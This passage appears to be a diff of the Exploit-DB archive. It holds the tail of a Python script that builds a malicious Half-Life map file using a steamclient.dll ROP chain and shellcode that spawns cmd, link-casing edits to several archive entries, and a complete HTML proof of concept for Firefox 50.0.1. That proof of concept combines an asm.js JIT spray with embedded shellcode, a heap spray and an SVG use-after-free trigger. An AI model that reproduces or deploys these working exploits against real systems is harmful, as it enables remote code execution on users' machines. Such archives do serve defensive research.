+    0x381236c5,  # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll]
+    0x381ebdc1,  # POP EBP # RETN [steamclient.dll]
+    0x381f98cd,  # & jmp esp [steamclient.dll]
+    0x387885ac,  # POP EBX # RETN [steamclient.dll]
+    0x00000001,  # 0x00000001-> ebx
+    0x384251c9,  # POP EDX # RETN [steamclient.dll]
+    0x00001000,  # 0x00001000-> edx
+    0x387cd449,  # POP ECX # RETN [steamclient.dll]
+    0x00000040,  # 0x00000040-> ecx
+    0x386c57fe,  # POP EDI # RETN [steamclient.dll]
+    0x385ca688,  # RETN (ROP NOP) [steamclient.dll]
+    0x0140b00e,  # POP EAX # RETN [hl.exe]
+    0x90909090,  # nop
+    0x385c0d3e,  # PUSHAD # RETN [steamclient.dll]
+  ]
+
+
+  # Can be replaced with ANY shellcode desired...
+  # http://shell-storm.org/shellcode/files/shellcode-662.php
+  shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \
+    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \
+    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \
+    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \
+    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \
+    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \
+    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \
+    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \
+    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \
+    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \
+    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \
+    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \
+    "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \
+    "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \
+    "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \
+    "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \
+    "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \
+    "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \
+    "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \
+    "\x24\x20\x57\xFF\xD0"
+
+  shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash)
+  shellcode += "\xeb\xfe"
+  shellcode += "\xeb\xfe"
+  shellcode += "\xeb\xfe"
+  shellcode += "\xeb\xfe"
+
+  shellcode_dwords = int(math.ceil(len(shellcode)/4.0))
+  extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0))
+
+  # Loop count (needs to be the exact amount of ROP we want to write
+  data_buffer.append(dw(extra_dwords))
+
+  for addr in rop_gadgets:
+    data_buffer.append(dw(addr))
+
+  for b in range(shellcode_dwords):
+    data = ""
+
+    for byte in range(4):
+      idx = byte + b*4
+
+      # pad to nearest DWORD with INT3
+      if idx >= len(shellcode):
+        data += "\xcc"
+      else:
+        data += shellcode[idx]
+
+    data_buffer.append(data)
+
+  second_idx += 8000*4 # time 4 because we skip every-other WORD, which means each index has 4 bytes
+
+  # 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before
+  # we can exploit the function
+
+  # UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW
+  #mmfile[NUM_EDGES_OFF] = pack("B", 0x41)
+
+  for i in range(int(math.ceil(len(data_buffer)/3.0))):
+    mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i)
+    mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i)
+
+    second_idx += 2 # required because the game loads every-other word
+
+    # This data will now be on the stack
+    for j in range(3):
+      sub_idx = j*4 + i*0xc
+      data_idx = i*3 + j
+      towrite = ""
+
+      if data_idx >= len(data_buffer):
+        towrite = "\x00"*4
+      else:
+        towrite = data_buffer[i*3 + j]
+
+      mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite
+      #l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx))
+
+  # write out the corrupted file
+  outfile = open(output_file, "wb")
+  outfile.write(mmfile)
+  outfile.close()
+
+  l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file))
+  l.info("Copy to game maps/ directory!")
+
+if __name__ == "__main__":
+  main()

platforms/windows/local/4625.txt

@@ -26,7 +26,7 @@ do not use the exploit for attacking.
 The attached file is at:
 
     http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
-    backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
+    Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
 
     MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6
 

platforms/windows/remote/20547.txt

@@ -20,6 +20,6 @@
 	was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability."
 	
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar
 	
 	

platforms/windows/remote/20758.c

@@ -8,7 +8,7 @@ Version: 0.3z R2
 Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
 Windows Server 2008, it should work on all Windows.
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
 */
 
 #include "main.h"

platforms/windows/remote/23080.txt

@@ -2,7 +2,7 @@ FreeSSHD all version Remote Authentication Bypass ZERODAY
 Discovered & Exploited by Kingcope
 Year 2011
 
-## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
+# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
 
 Run like:
 

platforms/windows/remote/32851.html

@@ -13,7 +13,7 @@
  Generation:
  	c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
 
- Exploit-DB mirror:  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
+ Exploit-DB Mirror:  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
 
 -->
 

platforms/windows/remote/42327.html

@@ -0,0 +1,375 @@
+<!DOCTYPE HTML>
+
+<!--
+
+    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
+    PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)
+
+    Tested on:
+
+    Release 50.0.1 32-bit - Windows 8.1 / Windows 10
+    https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe
+
+    Howto:
+
+    1) serve PoC over network and open it in Firefox 50.0.1 32-bit
+    2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe
+
+    A successfull exploit attempt should pop cmd.exe
+
+    Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/
+    
+    (C) Rh0
+
+    Jul. 13, 2017
+
+-->
+
+<script async>
+function asm_js_module(){
+    "use asm";
+    /* huge jitted nop sled */
+    function payload_code(){
+        var val = 0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        val = (val + 0xa8909090)|0;
+        /* 3 byte VirtualAlloc RWX stager */
+        val = (val + 0xa890db31)|0;
+        val = (val + 0xa89030b3)|0;
+        val = (val + 0xa81b8b64)|0;
+        val = (val + 0xa80c5b8b)|0;
+        val = (val + 0xa81c5b8b)|0;
+        val = (val + 0xa8b9006a)|0;
+        val = (val + 0xa8904c4c)|0;
+        val = (val + 0xa8902eb1)|0;
+        val = (val + 0xa85144b5)|0;
+        val = (val + 0xa8b99090)|0;
+        val = (val + 0xa8903233)|0;
+        val = (val + 0xa89045b1)|0;
+        val = (val + 0xa8514cb5)|0;
+        val = (val + 0xa8b99090)|0;
+        val = (val + 0xa8904e52)|0;
+        val = (val + 0xa8904bb1)|0;
+        val = (val + 0xa85145b5)|0;
+        val = (val + 0xa8590e6a)|0;
+        val = (val + 0xa84fe789)|0;
+        val = (val + 0xa8086b8b)|0;
+        val = (val + 0xa820738b)|0;
+        val = (val + 0xa8471b8b)|0;
+        val = (val + 0xa82ae349)|0;
+        val = (val + 0xa890c031)|0;
+        val = (val + 0xa890ad66)|0;
+        val = (val + 0xa89c613c)|0;
+        val = (val + 0xa8077c9d)|0;
+        val = (val + 0xa890202c)|0;
+        val = (val + 0xa89c073a)|0;
+        val = (val + 0xa8d7749d)|0;
+        val = (val + 0xa890bdeb)|0;
+        val = (val + 0xa8b9006a)|0;
+        val = (val + 0xa890636f)|0;
+        val = (val + 0xa8906cb1)|0;
+        val = (val + 0xa8516cb5)|0;
+        val = (val + 0xa8b99090)|0;
+        val = (val + 0xa890416c)|0;
+        val = (val + 0xa89075b1)|0;
+        val = (val + 0xa85161b5)|0;
+        val = (val + 0xa8b99090)|0;
+        val = (val + 0xa8907472)|0;
+        val = (val + 0xa89056b1)|0;
+        val = (val + 0xa85169b5)|0;
+        val = (val + 0xa890eb89)|0;
+        val = (val + 0xa83cc583)|0;
+        val = (val + 0xa8006d8b)|0;
+        val = (val + 0xa890dd01)|0;
+        val = (val + 0xa878c583)|0;
+        val = (val + 0xa8006d8b)|0;
+        val = (val + 0xa890dd01)|0;
+        val = (val + 0xa820458b)|0;
+        val = (val + 0xa890d801)|0;
+        val = (val + 0xa890d231)|0;
+        val = (val + 0xa890e789)|0;
+        val = (val + 0xa8590d6a)|0;
+        val = (val + 0xa810348b)|0;
+        val = (val + 0xa890de01)|0;
+        val = (val + 0xa890a6f3)|0;
+        val = (val + 0xa8900de3)|0;
+        val = (val + 0xa804c283)|0;
+        val = (val + 0xa890dbeb)|0;
+        val = (val + 0xa8247d8b)|0;
+        val = (val + 0xa890df01)|0;
+        val = (val + 0xa890ead1)|0;
+        val = (val + 0xa890d701)|0;
+        val = (val + 0xa890d231)|0;
+        val = (val + 0xa8178b66)|0;
+        val = (val + 0xa81c7d8b)|0;
+        val = (val + 0xa890df01)|0;
+        val = (val + 0xa802e2c1)|0;
+        val = (val + 0xa890d701)|0;
+        val = (val + 0xa8903f8b)|0;
+        val = (val + 0xa890df01)|0;
+        val = (val + 0xa890406a)|0;
+        val = (val + 0xa890c031)|0;
+        val = (val + 0xa85030b4)|0;
+        val = (val + 0xa85010b4)|0;
+        val = (val + 0xa890006a)|0;
+        val = (val + 0xa890d7ff)|0;
+        val = (val + 0xa890c931)|0;
+        val = (val + 0xa89000b5)|0;
+        val = (val + 0xa890c3b1)|0;
+        val = (val + 0xa890ebd9)|0;
+        val = (val + 0xa82434d9)|0;
+        val = (val + 0xa890e689)|0;
+        val = (val + 0xa80cc683)|0;
+        val = (val + 0xa890368b)|0;
+        val = (val + 0xa85fc683)|0;
+        val = (val + 0xa890c789)|0;
+        val = (val + 0xa81e8b66)|0;
+        val = (val + 0xa81f8966)|0;
+        val = (val + 0xa802c683)|0;
+        val = (val + 0xa802c783)|0;
+        val = (val + 0xa8901e8a)|0;
+        val = (val + 0xa8901f88)|0;
+        val = (val + 0xa803c683)|0;
+        val = (val + 0xa801c783)|0;
+        val = (val + 0xa803e983)|0;
+        val = (val + 0xa89008e3)|0;
+        val = (val + 0xa890cceb)|0;
+        val = (val + 0xa890e0ff)|0;
+        val = (val + 0xa824248d)|0;
+        /* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */
+        val = (val + 0xa882e8fc)|0;
+        val = (val + 0xa8000000)|0;
+        val = (val + 0xa8e58960)|0;
+        val = (val + 0xa864c031)|0;
+        val = (val + 0xa830508b)|0;
+        val = (val + 0xa80c528b)|0;
+        val = (val + 0xa814528b)|0;
+        val = (val + 0xa828728b)|0;
+        val = (val + 0xa84ab70f)|0;
+        val = (val + 0xa8ff3126)|0;
+        val = (val + 0xa8613cac)|0;
+        val = (val + 0xa82c027c)|0;
+        val = (val + 0xa8cfc120)|0;
+        val = (val + 0xa8c7010d)|0;
+        val = (val + 0xa852f2e2)|0;
+        val = (val + 0xa8528b57)|0;
+        val = (val + 0xa84a8b10)|0;
+        val = (val + 0xa84c8b3c)|0;
+        val = (val + 0xa8e37811)|0;
+        val = (val + 0xa8d10148)|0;
+        val = (val + 0xa8598b51)|0;
+        val = (val + 0xa8d30120)|0;
+        val = (val + 0xa818498b)|0;
+        val = (val + 0xa8493ae3)|0;
+        val = (val + 0xa88b348b)|0;
+        val = (val + 0xa831d601)|0;
+        val = (val + 0xa8c1acff)|0;
+        val = (val + 0xa8010dcf)|0;
+        val = (val + 0xa8e038c7)|0;
+        val = (val + 0xa803f675)|0;
+        val = (val + 0xa83bf87d)|0;
+        val = (val + 0xa875247d)|0;
+        val = (val + 0xa88b58e4)|0;
+        val = (val + 0xa8012458)|0;
+        val = (val + 0xa88b66d3)|0;
+        val = (val + 0xa88b4b0c)|0;
+        val = (val + 0xa8011c58)|0;
+        val = (val + 0xa8048bd3)|0;
+        val = (val + 0xa8d0018b)|0;
+        val = (val + 0xa8244489)|0;
+        val = (val + 0xa85b5b24)|0;
+        val = (val + 0xa85a5961)|0;
+        val = (val + 0xa8e0ff51)|0;
+        val = (val + 0xa85a5f5f)|0;
+        val = (val + 0xa8eb128b)|0;
+        val = (val + 0xa86a5d8d)|0;
+        val = (val + 0xa8858d01)|0;
+        val = (val + 0xa80000b2)|0;
+        val = (val + 0xa8685000)|0;
+        val = (val + 0xa86f8b31)|0;
+        val = (val + 0xa8d5ff87)|0;
+        val = (val + 0xa80efebb)|0;
+        val = (val + 0xa868ea32)|0;
+        val = (val + 0xa8bd95a6)|0;
+        val = (val + 0xa8d5ff9d)|0;
+        val = (val + 0xa87c063c)|0;
+        val = (val + 0xa8fb800a)|0;
+        val = (val + 0xa80575e0)|0;
+        val = (val + 0xa81347bb)|0;
+        val = (val + 0xa86a6f72)|0;
+        val = (val + 0xa8ff5300)|0;
+        val = (val + 0xa86d63d5)|0;
+        val = (val + 0xa8652e64)|0;
+        val = (val + 0xa8006578)|0;
+        val = (val + 0xa8909090)|0;
+
+        return val|0;
+    }
+    return payload_code 
+}
+</script>
+
+<script>
+function spray_asm_js_modules(){
+    sprayed = []
+    for (var i=0; i<= 0x1800; i++){
+        sprayed[i] = asm_js_module()
+    }
+}
+
+/* heap spray inspired by skylined */
+function heap_spray_fake_objects(){
+    var heap = []
+    var current_address = 0x08000000
+    var block_size = 0x1000000
+    while(current_address < object_target_address){
+        var heap_block = new Uint32Array(block_size/4 - 0x100)
+        for (var offset = 0; offset < block_size; offset += 0x100000){
+
+            /* fake object target = ecx + 0x88 and fake vtable*/
+            heap_block[offset/4 + 0x00/4] = object_target_address
+            /* self + 4 */
+            heap_block[offset/4 + 0x14/4] = object_target_address
+            /* the path to EIP */
+            heap_block[offset/4 + 0x18/4] = 4
+            heap_block[offset/4 + 0xac/4] = 1
+            /* fake virtual function --> JIT target */
+            heap_block[offset/4 + 0x138/4] = jit_payload_target 
+        }
+        heap.push(heap_block)
+        current_address += block_size
+    }
+    return heap
+}
+
+/* address of fake object */
+object_target_address = 0x30300000
+
+/* address of our jitted shellcode */
+jit_payload_target = 0x1c1c0054
+
+/* ASM.JS JIT Spray */
+spray_asm_js_modules()
+
+/* Spray fake objects */
+heap = heap_spray_fake_objects()
+
+/* -----> */
+/* bug trigger ripped from bugzilla report */
+var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
+worker.postMessage("zero");
+var svgns = 'http://www.w3.org/2000/svg';
+var heap80 = new Array(0x1000);
+var heap100 = new Array(0x4000);
+var block80 = new ArrayBuffer(0x80);
+var block100 = new ArrayBuffer(0x100);
+var sprayBase = undefined;
+var arrBase = undefined;
+var animateX = undefined;
+var containerA = undefined;
+var offset = 0x88 // Firefox 50.0.1
+
+var exploit = function(){
+    var u32 = new Uint32Array(block80)
+
+    u32[0x4] = arrBase - offset;
+    u32[0xa] = arrBase - offset;
+    u32[0x10] = arrBase - offset;
+
+    for(i = heap100.length/2; i < heap100.length; i++)
+    {
+      heap100[i] = block100.slice(0)
+    }
+
+    for(i = 0; i < heap80.length/2; i++)
+    {
+      heap80[i] = block80.slice(0)
+    }
+
+    animateX.setAttribute('begin', '59s')
+    animateX.setAttribute('begin', '58s')
+
+    for(i = heap80.length/2; i < heap80.length; i++)
+    {
+      heap80[i] = block80.slice(0)
+    }
+
+    for(i = heap100.length/2; i < heap100.length; i++)
+    {
+      heap100[i] = block100.slice(0)
+    }
+
+    animateX.setAttribute('begin', '10s')
+    animateX.setAttribute('begin', '9s')
+    containerA.pauseAnimations();
+}
+
+worker.onmessage = function(e) {arrBase=object_target_address; exploit()}
+//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}
+
+var trigger = function(){
+    containerA = document.createElementNS(svgns, 'svg')
+    var containerB = document.createElementNS(svgns, 'svg');
+    animateX = document.createElementNS(svgns, 'animate')
+    var animateA = document.createElementNS(svgns, 'animate')
+    var animateB = document.createElementNS(svgns, 'animate')
+    var animateC = document.createElementNS(svgns, 'animate')
+    var idA = "ia";
+    var idC = "ic";
+    animateA.setAttribute('id', idA);
+    animateA.setAttribute('end', '50s');
+    animateB.setAttribute('begin', '60s');
+    animateB.setAttribute('end', idC + '.end');
+    animateC.setAttribute('id', idC);
+    animateC.setAttribute('end', idA + '.end');
+    containerA.appendChild(animateX)
+    containerA.appendChild(animateA)
+    containerA.appendChild(animateB)
+    containerB.appendChild(animateC)
+    document.body.appendChild(containerA);
+    document.body.appendChild(containerB);
+}
+
+window.onload = trigger;
+setInterval("window.location.reload()", 3000)
+/* <----- */
+
+</script>

platforms/windows/remote/4948.txt

@@ -1,5 +1,5 @@
 Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
 
 # milw0rm.com [2008-01-21]

platforms/windows/remote/5213.txt

@@ -1,5 +1,5 @@
 Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
 
 # milw0rm.com [2008-03-04]